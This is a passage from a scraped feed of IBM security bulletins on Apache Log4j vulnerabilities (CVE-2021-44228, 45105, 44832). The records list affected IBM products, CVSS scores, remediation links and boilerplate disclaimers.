CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9JLE\",\"label\":\"IBM Security Access Manager for Enterprise Single Sign-On\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.2.1, 8.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T01:13:26", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server shipped with IBM Security Access Manager for Enterprise Single Sign-On (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-13T01:13:26", "id": "89170AA222353F9A48D8A118FE03328E07C65970B2FBD60979FC33A65AECC8CB", "href": "https://www.ibm.com/support/pages/node/6540502", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-19T00:58:10", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM OpenPages with Watson. Information about security vulnerabilities affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**| ** ****Affected Supporting Product and Version** \n---|--- \nIBM OpenPages with Watson 8.1| IBM WebSphere Application Server 9.0.0.10 \n \n \n\n\n## Remediation/Fixes\n\nPlease consult the security bulletin [IBM WebSphere Application Server](<https://www.ibm.com/support/pages/node/6538148> \"IBM WebSphere Application Server\" ) for remediation details.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 Jun 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFUEU\",\"label\":\"IBM OpenPages with Watson\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2022-06-14T22:23:12", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM OpenPages with Watson (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-06-14T22:23:12", "id": "666E4FBDA68F1376E7E84944B116ED00320BF80162EF68755AD1CD31AE358231", "href": "https://www.ibm.com/support/pages/node/6594201", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-29T02:08:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM WebSphere Application Server Patterns. Information about the Apache Log4j security vulnerabilities (CVE-2021-44832, CVE-2021-45105) affecting IBM WebSphere Application Server have been published in a separate security bulletin. The interim fix removes Apache Log4j.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version** \n \n---|--- \nIBM WebSphere Application Server Patterns: \n\n * 2.3.3.3\n| IBM WebSphere Application Server: \n\n * 9.0\n * 8.5 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. Please consult the following security bulletin for vulnerability details and information about fixes.\n\n * [Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server (CVE-2021-45105, CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6538148> \"Multiple vulnerabilities in Apache log4j affect IBM WebSphere Application Server \\(CVE-2021-45105, CVE-2021-44832\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SSAJ7T\",\"label\":\"WebSphere Application Server Patterns\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF002\",\"label\":\"AIX\"}],\"Version\":\"Version Independent\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T21:43:58", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM WebSphere Application Server Patterns is vulnerable to arbitrary code execution (CVE-2021-44832) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44832", "CVE-2021-45105"], "modified": "2022-01-13T21:43:58", "id": "C786E96DD673C5766A45B6750BE6B879F3CF37718ACD79668ADC1130AF26E274", "href": "https://www.ibm.com/support/pages/node/6540686", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-04T23:45:58", "description": "## Summary\n\nIBM Security Verify Governance Products NOT Affected by CVE-2021-44228 Exploit\n\n## Vulnerability Details\n\nAfter conducting extensive research product code base, it is determined that none of the products outlined below are using the vulnerable Java library log4j version with JNDI exploit (CVE-2021-44228)\n\n * IBM Security Identity Governance and Intelligence*\n * IBM Security Identity Manager*\n * IBM Security Verify Governance*\n\n* All supported versions and all their add-on components such as Adapters and Information Queue\n\n**Updated Tuesday, Dec 21 2021**\n\nClarification for customers running IBM Security Verify Governance Products (Identity Manager) mentioned in this bulletin deployed as Software Stack (not Virtual Appliance):\n\n * Apply the WebSphere Application Server Interim Fix for your existing FP level. Don\u2019t apply WebSphere Application Server 9.0.5.10 ( <https://www.ibm.com/support/pages/node/6526686> )\n\n**Updated Monday, Dec 20 2021**\n\nRefer to the WebSphere Application Server security bulletins for **additional information**:\n\n<https://www.ibm.com/support/pages/node/6525706> \n<https://www.ibm.com/support/pages/node/6526750>\n\n * Customers running IBM Security Verify Governance Products (Identity Manager) mentioned in this bulletin deployed as Software Stack (not Virtual Appliance) must refer to WebSphere Application Server security bulletin and apply the required WebSphere patches.\n * IBM Security Verify Governance Products mentioned in this bulletin deployed as Virtual Appliances do not use the WebSphere Application Server Admin Console or the UDDI Registry application, therefore they are not affected by the WebSphere Application Server vulnerability. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nhttps://www.ibm.com/products/verify-governance\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSBM27\",\"label\":\"IBM Security Verify Governance\"},\"ARM Category\":[{\"code\":\"a8m0z0000001hXBAAY\",\"label\":\"Identity Governance \\u0026 Intelligence\"},{\"code\":\"a8m0z0000001hXGAAY\",\"label\":\"Identity Manager\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\",\"Type\":\"MASTER\"},{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSGHJR\",\"label\":\"IBM Security Identity Governance and Intelligence\"},\"ARM Category\":[{\"code\":\"a8m0z0000001hXBAAY\",\"label\":\"Identity Governance \\u0026 Intelligence\"},{\"code\":\"a8m0z0000001hXGAAY\",\"label\":\"Identity Manager\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"},{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRMWJ\",\"label\":\"IBM Security Identity Manager\"},\"ARM Category\":[{\"code\":\"a8m0z0000001hXGAAY\",\"label\":\"Identity Manager\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-04T18:53:13", "type": "ibm", "title": "Security Bulletin: IBM Security Verify Governance Products NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-04T18:53:13", "id": "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "href": "https://www.ibm.com/support/pages/node/6526752", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:42:42", "description": "## Summary\n\nIBM Security Privileged Identity Manager NOT Affected by CVE-2021-44228 Exploit. \n\n## Vulnerability Details\n\nAfter conducting extensive research on product code base, it is determined that all versions of IBM Security Privileged Identity Manager are not vulnerable to Java library Apache log4j v2 with JNDI exploit (CVE-2021-44228).\n\n### [](<https://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md#integrations>)\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nhttps://docs.thycotic.com/bulletins/current/2021/cve-2021-44228-exploit.md\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRQBP\",\"label\":\"IBM Security Privileged Identity Manager\"},\"ARM Category\":[{\"code\":\"a8m0z0000001hYYAAY\",\"label\":\"Privileged Identity Manager\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T02:18:21", "type": "ibm", "title": "Security Bulletin: IBM Security Privileged Identity Manager NOT Affected by CVE-2021-44228 Exploit", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T02:18:21", "id": "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "href": "https://www.ibm.com/support/pages/node/6527016", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T23:46:49", "description": "## Summary\n\nIBM TRIRIGA Indoor Maps, a component of IBM TRIRIGA Portfolio Data Manager is vulnerable to Apache Log4j library vulnerability (CVE-2021-44228) as it is used as a common logging tool. Apache Log4j is used by IBM TRIRIGA Indoors Maps as part of its logging infrastructure. This bulletin addresses this vulnerability by mitigating Apache Log4j while a final fix is being developed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM TRIRIGA Indoor Maps| 11.0 \n \n\n\n## Remediation/Fixes\n\nWorkarounds and Mitigations are provided below\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now. \n\n**Affected Product(s)**| **Version(s)**| **Link** \n---|---|--- \nIBM TRIRIGA Indoor Maps - ArcGIS Server| 11.0| <https://support.esri.com/en/Technical-Article/000026951> \nIBM TRIRIGA Indoor Maps - Portal for ArcGIS| 11.0| <https://support.esri.com/en/Technical-Article/000026950> \nIBM TRIRIGA Indoor Maps - ArcGIS Data Store| 11.0| <https://support.esri.com/en/Technical-Article/000026949> \n \n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSFCZ3\",\"label\":\"IBM TRIRIGA Portfolio Data Manager\"},\"Component\":\"IBM TRIRIGA Indoor Maps\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB02\",\"label\":\"AI Applications\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-31T13:51:36", "type": "ibm", "title": "Security Bulletin: IBM TRIRIGA Indoor Maps, a component of IBM TRIRIGA Portfolio Data Manager is vulnerable to arbitrary code execution due to Apache Log4j library vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-31T13:51:36", "id": "00CA973D0D5F4A08ADB77D27F66CF53D661D1B67B8DA263B3CE4522918A4CFFF", "href": "https://www.ibm.com/support/pages/node/6552298", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:05:04", "description": "## Summary\n\nApache Log4j open source library is used by Content Collector for File Systems. The vulnerability affects the Content Collector AFUKnowledgeCenter component. This bulletin describes the upgrades necessary to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for File Systems| 4.0.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading the product below:\n\n**Product**\n\n| **VRM**| **Remediation** \n---|---|--- \nContent Collector for File Systems| 4.0.1| Upgrade to: Content Collector for File Systems [4.0.1.13](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.13-IBM-ICC-FP013&source=SAR> \"4.0.1.13\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY 